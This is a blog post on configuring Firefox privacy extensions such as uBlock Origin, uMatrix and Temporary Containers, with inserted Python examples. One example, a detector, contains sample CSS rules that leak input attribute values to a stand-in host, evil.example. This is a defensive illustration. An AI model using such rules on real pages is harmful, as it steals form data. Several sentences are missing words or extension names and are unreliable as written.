I've tried plenty of things to help improve privacy on the internet. I've done
the whole spectrum from minimum-effort and no privacy to privacy-nut lock down
mode. In this post I'm going to go over various things I've used and different
setups I've had, then walk through explaining what I have now and how to
recreate the setup.
### SETUP 3 ###
This is what I'd probably call a "realist" setup. You get a reasonable level of
privacy and it's not terrifying to work with. Sites for the most part work fine
after a little tweaking. This is the setup I use at the moment, so I'll walk
through what I've done and explain how to recreate it.
First place to start is with extensions. I have 12 installed and I'll walk
through each including all the settings I have for them:
is designed to remove nonsense from URLs that can be used for
tracking. It's very simple and I've done no config with it. Just install it and
maybe hide the button for it as you'll probably never need to click it. It's
nice to keep the UI tidy so there's more space for the stuff that actually
CSS Exfil Protection protects you against "CSS data exfiltration attacks". Very
simple little extension with no options to configure. As before, add, hide
button, move on.
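As an added illustration (this is not code from the post, nor from the CSS Exfil Protection extension itself), here is a small Python check for the shape such attacks take: a stylesheet rule whose selector matches on an attribute value (for example input[value^="a"]) and whose declaration makes the browser fetch an external URL, so a match leaks one character of the attribute to that server. The sample stylesheet and the evil.example host are constructed for the example.

```python
import re

# Constructed sample stylesheet (not from the original post): one benign
# rule, two rules shaped like the attribute-selector exfil pattern, and one
# rule that uses a same-origin url() and therefore should not be flagged.
SAMPLE_CSS = """
a:hover { color: #0a0; }
input[name="csrf"][value^="a"] { background-image: url(https://evil.example/log?v=a); }
input[name="csrf"][value^="b"] { background: url("https://evil.example/log?v=b"); }
#logo { background: url(/static/logo.png); }
"""

# Any attribute selector that constrains the attribute's value
# (=, ^=, $=, *=, ~=, |=). Matching on a value is what turns CSS into an oracle.
ATTR_VALUE_SELECTOR = re.compile(r"\[\s*[\w-]+\s*[\^\$\*~|]?=\s*[^\]]+\]")
# A url() whose target is absolute (scheme-relative or http/https), i.e. a
# request that leaves the page's own origin when the selector matches.
EXTERNAL_URL = re.compile(r"url\(\s*['\"]?(https?:)?//", re.IGNORECASE)
# Crude rule splitter: "selector { declarations }", good enough for flat CSS.
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.DOTALL)


def find_exfil_rules(css: str):
    """Return (selector, declarations) pairs that combine a value-matching
    attribute selector with a fetch of an external URL."""
    hits = []
    for m in RULE.finditer(css):
        selector, body = m.group(1).strip(), m.group(2).strip()
        if ATTR_VALUE_SELECTOR.search(selector) and EXTERNAL_URL.search(body):
            hits.append((selector, body))
    return hits


if __name__ == "__main__":
    for selector, body in find_exfil_rules(SAMPLE_CSS):
        print("suspicious rule:", selector, "->", body)
```

The heuristic is deliberately simple: it only looks at flat rules and only treats absolute URLs as external, so a stylesheet injected on the page's own origin that reports back to a same-origin path would slip past it. That mirrors the trade-off the extension makes between catching the common pattern and not breaking ordinary styling.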
that you get them locally and use them locally and so avoid making needless
Decentraleyes has 4 options, and we want all enabled except the second one,
labelled "Block requests for missing resources", as that will break a
tremendous amount of things.
Firefox Multi-Account Containers is one of Mozilla's own extensions and it adds
the ability to create special containers for tabs to sit in. The idea is that
each container is completely separated from the next, so some sketchy website in
one container can't see any cookies from or exploit the state of any other tab
in a different container. You might have heard of the very simple tracking
attack in which a site can make requests to specific image URLs and use the
response code to determine whether you're logged into Facebook or Twitter or
whatnot. Having a malicious site in a container and social media in a different
one makes you safe from this kind of attack, as the request for the image is
made from the isolated container without the social media site's cookies, so it
looks logged-out even if you're logged in in another container.
This extension doesn't have any options, but what you want to do is clear the
stock containers it makes and create an individual container for each website
you log into that you want to stay logged into. For instance, I have one for
Riot, one for Mastodon, one for Protonmail (though it's not entirely necessary),
and one for DuckDuckGo (to keep the theme the same).
is much the same as Smart HTTPS and other similar HTTPS-enforcing
extensions, but it's very lightweight and unobtrusive and also claims to get
along well with Temporary Containers which is a good thing. In the options for
it, we want Automatic mode on, "Remember secure sites" on, and to check again if
a site supports HTTPS after Firefox is restarted to make sure when a site fixes
itself and uses HTTPS that we get on it as soon as possible.
Invidition is less a privacy boost and more a convenience boost. If - like me -
you use Invidious, then this extension will intercept any requests to YouTube
before they're even sent and redirect them to Invidious. This means you can very
safely click on a YouTube link without worrying about Google because you'll get
sent straight to Invidious. I didn't change any options for this extension.
Privacy-Oriented Origin Policy removes origin headers from requests when
they're unlikely to be necessary. This dramatically aids in protecting your
privacy - especially when using a VPN as you absolutely should be
later too). We want "Global mode" on "aggressive", nothing in "Overrides", "Type
filters" won't have any effect in aggressive mode, and under "Exclusions" we
want "Exclude root domain matches" to be enabled.
does what it says on the tin and will attempt to find the source
URL from redirects and go there directly rather than stopping at however many
intermediate pages. Most intermediate pages are used for tracking, so avoiding
them here helps plenty. Under "Mode", we want it set to "Skip all redirects
except for URLs matching any of the lines on the blacklist" but have "Skip
redirects for URLs with the same public domain" disabled. The blacklist should
have a number of things there by default such as "/account", "/auth", and such.
Leave these as they are. I'd also optionally disable the notification pop-up as
it can get a little annoying at times - especially if you have your
notifications make noise.
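To make the two URL-level behaviours described above concrete (stripping tracking junk from URLs, and unwrapping redirect URLs while leaving account and auth flows alone), here is an added Python example. It is not code from the post or from either extension: the tracking-parameter names are a constructed sample, the blacklist reuses only the "/account" and "/auth" entries the post mentions, and the "same public domain" test is approximated with the last two hostname labels because the example carries no public-suffix list.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Constructed sample of parameters that exist only to track the click.
TRACKING_PARAMS = {"utm_source", "utm_medium", "utm_campaign", "utm_term",
                   "utm_content", "fbclid", "gclid"}

# Path prefixes the post mentions as default blacklist entries: redirects
# under these are part of login/account flows and must not be skipped.
REDIRECT_BLACKLIST = ("/account", "/auth")


def strip_tracking_params(url: str) -> str:
    """Drop known tracking query parameters, keep everything else in order."""
    parts = urlsplit(url)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.lower() not in TRACKING_PARAMS]
    return urlunsplit(parts._replace(query=urlencode(kept)))


def public_domain(host: str) -> str:
    """Approximation: last two labels. A real implementation would consult
    the public suffix list (assumption made for this example)."""
    return ".".join(host.lower().split(".")[-2:])


def skip_redirect(url: str, skip_same_domain: bool = False) -> str:
    """Return the destination embedded in a redirect URL, or the URL itself
    when it is blacklisted, when no destination is embedded, or when the
    destination shares the redirector's public domain and skip_same_domain
    is off (the setting the post recommends)."""
    parts = urlsplit(url)
    if any(parts.path.startswith(p) for p in REDIRECT_BLACKLIST):
        return url
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already percent-decodes, so an embedded URL is readable here
        if value.startswith(("http://", "https://")):
            target = urlsplit(value)
            same = public_domain(target.netloc) == public_domain(parts.netloc)
            if same and not skip_same_domain:
                return url
            return value
    return url


def clean_url(url: str) -> str:
    """What a click would resolve to with both behaviours applied."""
    return strip_tracking_params(skip_redirect(url))


if __name__ == "__main__":
    print(clean_url("https://t.example/redirect?url=https%3A%2F%2Fnews.example"
                    "%2Farticle%3Futm_source%3Dtw%26id%3D7"))
```

Note that the blacklist check runs before any destination is looked for, which is why an "/auth?next=..." hop survives untouched: skipping it would land you on the target page without the session the hop was about to create.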
is a wonderful extension. It won't improve your privacy, but it's
absolutely wonderful for making the websites you use a lot look nicer. This
extension is completely optional, but I like using it, especially for little
fixes. For instance, I have a style on Mastodon for making the columns in the UI
expand so they evenly fill the width of the screen so they're a little wider. I
also have a number of fixes for Riot such as removing a few buttons, changing
the mention colour to the green so they don't look like horrible errors,
swapping around a few username colours so I'm the nice blue rather than green,
and reducing the size of images as they are unusably huge.
Temporary Containers is arguably the most powerful privacy-boosting extension
you'll get here. It uses exactly the same system as the Multi-account
containers, but automatically spawns new containers for each website you visit
so they're all completely isolated. There are quite a few options though - we'll
start in the "General" tab. Enable automatic mode - this is what makes everything
work nice and smoothly. Don't have notifications when containers are deleted or
that's all you'll see in your notifications. Leave the container name prefix as
"tmp", or you can change it if you want, but eh. Random colours are nice to help
see them working, but leave the icon on the circle so it stays tidy as these
containers are going to be showing up in the list under Multi-account
containers. Everything else on this tab stays default - onto the "Isolation"
tab. Ignore the "Per Domain" settings and go straight to "Global". There are 4
options with drop downs. We want all of them to be set to the option that has
get isolated" in parentheses at the end. Next, under "Multi-
Account Containers" we want that option disabled otherwise everything we do with
permanent containers gets broken. On the "Advanced" tab, disable ignoring
requests for "getpocket.com" as Pocket is stupid anyway - let it break.
uBlock Origin is an ad-blocker, but comes with a few extra powers. We'll be
using it mainly just as a static content blocker, where uMatrix will be more
dynamic and interactive. Under the "Settings" tab, we want to enable "Hide
placeholders of blocked elements" to keep our pages tidy, enable "Show the
number of blocked requests on the icon", enable "Make use of context menu where
appropriate", disable "Disable tooltips", disable "Color-blind friendly" (unless
you're colour-blind obviously), disable "Enable cloud storage support", and
enable "I am an advanced user" briefly. Click the little gears icon next to that
last option and look for the option named "suspendTabsUntilReady". Make that say
"true". This completely blocks anything from loading at all until uBlock is
ready to filter things. This prevents unwanted trackers and content being loaded
before uBlock is ready to filter it out. Continuing now, enable all options
under "Privacy" and under default behaviour we want to enable "Disable cosmetic
filtering". Next we want to go to the "Filter lists" tab. Enable "Auto-update
filter lists", disable "Parse and enforce cosmetic filters", and enable "Ignore
generic cosmetic filters". For the filters themselves we want the following: "My
filters", all "Built-in" lists excluding the experimental one, "Adblock Warning
Removal List", "EasyList", all "Privacy" lists, all "Malware domains" lists,
"AdGuard Annoyances", "Fanboy's Annoyance List", "Dan Pollock's hosts file",
"Pete Lowe's Ad and tracking server list", and finally we want to import a
custom list, using the URL 'https://raw.githubusercontent.com/hostsadiq/adblock-nocoin-list/master/nocoin.txt'.
Remember to apply changes. We're using
Decentraleyes, so under the "My Rules" tab, we want to add the following:
* ajax.googleapis.com * noop
* ajax.aspnetcdn.com * noop
* ajax.microsoft.com * noop
* cdnjs.cloudflare.com * noop
* code.jquery.com * noop
* cdn.jsdelivr.net * noop
* yastatic.net * noop
* yandex.st * noop
* apps.bdimg.com * noop
* libs.baidu.com * noop
* lib.sinaapp.com * noop
* upcdn.b0.upaiyun.com * noop
* cdn.bootcss.com * noop
* sdn.geekzu.org * noop
* ajax.proxy.ustclug.org * noop
uMatrix is a dynamic filtering extension that allows you to see what's being
requested from where and selectively block and allow only what you're ok with.
Starting simple, open the extension and switch to global mode (asterisk). We
want to block "all" so everything is denied by default, but we want to enable
all CSS and images. Next, we want to allow cookies and frames for 1st party.
Lastly, open the 3 dots menu and enable "Forbid web workers", "Spoof Referer
header", and "Spoof <noscript> tags". Next, we can go into preferences.
Under the "Settings" tab under "Convenience", we want to enable "Show the number
of blocked resources on the icon", disable "Hide placeholder of blocked
elements" but enable "Hide placeholder of blacklisted elements", enable "Spoof
<noscript> tags when 1st party scripts are blocked", and disable the last 2
options. Ignore the "Matrix" options, then enable everything under "Privacy"
except "Strict HTTPS: forbid mixed content" as it'll otherwise break a lot of
things. Under the "My rules" tab, make sure there's the option "no-workers: * true"
added and committed. Lastly we want to go to the "Assets" tab. Enable
"Auto-update assets", but we want to disable all the hosts files as uBlock
Origin is handling this all for us already. Under "Ruleset recipes", enable
"Ruleset recipes for English websites". If you're using Invidition, then import
a rule set recipe by putting in this URL: 'https://gitlab.com/Booteille/invidition/raw/master/umatrix/recipe.txt'.
Next, add the same rules from above to the
"My Rules" tab in uMatrix as we did before in uBlock Origin.
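Both the uBlock Origin "My rules" lines listed earlier and the uMatrix global matrix just described use the same four-column "source destination type action" syntax, so one added example can show how a request resolves under each. This is my own Python evaluator, not code from the post or from either extension. The uMatrix rule lines are my rendering of the clicks the post describes (block all, allow CSS and images, allow 1st-party cookies and frames, forbid web workers), not text copied from the post; the uBlock lines are three of the noop rules from the list above. Precedence follows the matrix model (a more specific source wins, then a more specific destination, then a specific type over "*"); the 1st-party test is approximated with the last two hostname labels since the example has no public-suffix list.

```python
# Constructed uMatrix rules mirroring the global settings described in the post.
UMATRIX_RULES = """
* * * block
* * css allow
* * image allow
* 1st-party cookie allow
* 1st-party frame allow
no-workers: * true
"""

# Three of the uBlock Origin noop lines from the post. "noop" means "no
# dynamic rule here": the request falls through to the static filter lists,
# which is what lets Decentraleyes intercept these CDN hosts locally.
UBLOCK_RULES = """
* ajax.googleapis.com * noop
* cdnjs.cloudflare.com * noop
* code.jquery.com * noop
"""


def parse_rules(text):
    """Split rule text into matrix rules and switch rules ("name: scope value")."""
    matrix, switches = [], {}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0].endswith(":"):                 # e.g. "no-workers: * true"
            switches[(parts[0][:-1], parts[1])] = parts[2] == "true"
        else:
            src, dst, rtype, action = parts
            matrix.append((src, dst, rtype, action))
    return matrix, switches


def host_match(pattern, host):
    """0 for "*", a positive specificity if host is pattern or a subdomain of
    it, None if it does not match."""
    if pattern == "*":
        return 0
    if host == pattern or host.endswith("." + pattern):
        return 1 + pattern.count(".")
    return None


def same_site(src, dst):
    """Approximate 1st-party check: same last two labels (assumption: no PSL)."""
    return src.split(".")[-2:] == dst.split(".")[-2:]


def evaluate(rules, src, dst, rtype):
    """Return the action of the most specific matching rule, or None when no
    dynamic rule applies (uBlock then defers to its static filters)."""
    matrix, switches = parse_rules(rules)
    if rtype == "worker":
        # no-workers is a per-scope switch, checked from the page host outward
        labels = src.split(".")
        scopes = [".".join(labels[i:]) for i in range(len(labels) - 1)] + ["*"]
        if any(switches.get(("no-workers", s)) for s in scopes):
            return "block"
    best, best_score = None, None
    for r_src, r_dst, r_type, action in matrix:
        s = host_match(r_src, src)
        if s is None:
            continue
        if r_dst == "1st-party":
            d = 1 if same_site(src, dst) else None
        else:
            d = host_match(r_dst, dst)
            if d:
                d += 1                              # explicit hosts beat 1st-party
        if d is None:
            continue
        if r_type == "*":
            t = 0
        elif r_type == rtype:
            t = 1
        else:
            continue
        score = (s, d, t)
        if best_score is None or score > best_score:
            best, best_score = action, score
    return best


if __name__ == "__main__":
    for dst, rtype in [("news.example", "script"), ("cdn.example", "image"),
                       ("static.news.example", "frame"), ("tracker.example", "frame")]:
        print("uMatrix", dst, rtype, "->", evaluate(UMATRIX_RULES, "news.example", dst, rtype))
    print("uBlock ajax.googleapis.com ->", evaluate(UBLOCK_RULES, "news.example", "ajax.googleapis.com", "script"))
```

Running it shows why the post pairs the two extensions the way it does: under the uMatrix defaults a third-party script is blocked while a first-party frame is allowed, and under the uBlock noop lines a CDN host gets no dynamic verdict at all, so the decision is left to the static lists and, in practice, to Decentraleyes serving the file locally.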
Copyright Oliver Ayre 2019. Site licensed under the GNU Affero General Public
Licence version 3 (AGPLv3).